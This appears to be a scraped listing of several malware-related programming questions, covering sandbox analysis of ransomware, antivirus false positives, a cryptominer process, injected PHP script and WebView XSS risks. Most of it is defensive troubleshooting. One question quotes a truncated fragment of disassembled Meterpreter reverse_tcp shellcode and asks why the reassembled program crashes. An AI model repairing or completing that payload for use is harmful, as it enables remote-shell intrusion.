malware

How do I extract specific files from Cuckoo Sandbox VM?

女生的网名这么多〃 submitted on 2021-02-11 14:13:56
Question: I study ransomware behavior with Cuckoo Sandbox. I need to get the encrypted files and the threatening letter that the ransomware created, but they exist on my Cuckoo Sandbox VM. How do I extract specific files from its VM? My environment: Cuckoo Sandbox 2.06; Host OS: Ubuntu 18.04; Guest OS: Windows 7 SP1 x86 (without guest additions); VM software: VirtualBox 5.2. Answer 1: You can get the required time to handle your manipulations by: 1- specify a high number of seconds either using the command line (ex -

VirusTotal flags the 32-bit version of my program as malware

允我心安 submitted on 2021-02-08 10:09:41
Question: I've run into a very odd thing. I wrote a pretty simple program in C#, and tried to build a 32-bit and a 64-bit version of it. The 64-bit version works fine, but whenever I try to build the 32-bit version, my antivirus software removes it. I've uploaded both files to VirusTotal here: 32 bit: https://virustotal.com/da/file/fdb3d2870ce876b49eb5d9371fc0b133b7657ddd994603777a42a47f3eb09d8b/analysis/1461779525/ 64 bit: https://virustotal.com/da/file

Why is this assembly program crashing (re-assembled ndisasm output)?

社会主义新天地 submitted on 2021-01-29 12:39:57
Question: I extracted the assembly code of the windows/meterpreter/reverse_tcp payload with lhost set to 127.0.0.1 and lport set to 443; however, after building the assembly program with fasm the program crashes. Any ideas as to why? Assembly code: format PE console use32 entry start start: pusha mov ebp,esp xor edx,edx mov edx,[fs:edx+0x30] mov edx,[edx+0xc] mov edx,[edx+0x14] xor edi,edi movzx ecx,word [edx+0x26] mov esi,[edx+0x28] xor eax,eax lodsb cmp al,0x61 jl 0x27 sub al,0x20 ror edi, 0xd add

kdevtmpfsi using the entire CPU

淺唱寂寞╮ submitted on 2020-12-03 07:42:38
Question: We are using an EC2 (Ubuntu) Amazon instance for running Apache. Recently we noticed that there is a process using the entire CPU. We removed it with the help of the following procedure [root@hadoop002 tmp]# systemctl status 25177 ● session-5772.scope - Session 5772 of user root Loaded: loaded (/run/systemd/system/session-5772.scope; static; vendor preset: disabled) Drop-In: /run/systemd/system/session-5772.scope.d └─50-After-systemd-logind\x2eservice.conf, 50-After-systemd-user-sessions

C programs getting detected as malware

白昼怎懂夜的黑 submitted on 2020-07-03 05:21:06
Question: Recently my C programs started to act weirdly and I had no idea why... Then I realized that they were being flagged by my antivirus program as malware... First I thought there was malware in my compiler (I'm using the CodeBlocks IDE with MinGW-GCC as the C compiler); an antivirus scan returned nothing. So I started experimenting on it... I wrote a simple hello world in C: #include <stdio.h> int main() { printf("Hello"); return 0; } As soon as I compiled it, Windows Defender flagged it as Trojan:Win32

About removing malware scripts

拟墨画扇 submitted on 2019-12-31 03:57:19
Question: I am working on a PHP website and it regularly gets infected by malware. I've gone through all the security steps but failed. But I know how it infects my code every time. It comes at the start of my PHP index file as follows: <script>.....</script><? Can anybody please help me with how I can remove the starting block of code from every index file in my server folders? I will use a cron job for this. I have already gone through the regex question on removal of JavaScript malware but did not find what I want.

Android app using WebView/JavaScript: what can be a security concern?

自闭症网瘾萝莉.ら submitted on 2019-12-28 05:38:25
Question: I am creating an Android web app using WebView and JavaScript, calling addJavascriptInterface(true). My app will contain data (HTML) that will be loaded from an external site. I am worried about the cross-site scripting (XSS)/security of my app as I am enabling addJavascriptInterface(true). What are the things I should take care of so that no malicious code can run in my app? Answer 1: I found a good study from Syracuse University called Attacks on WebView in the Android System, which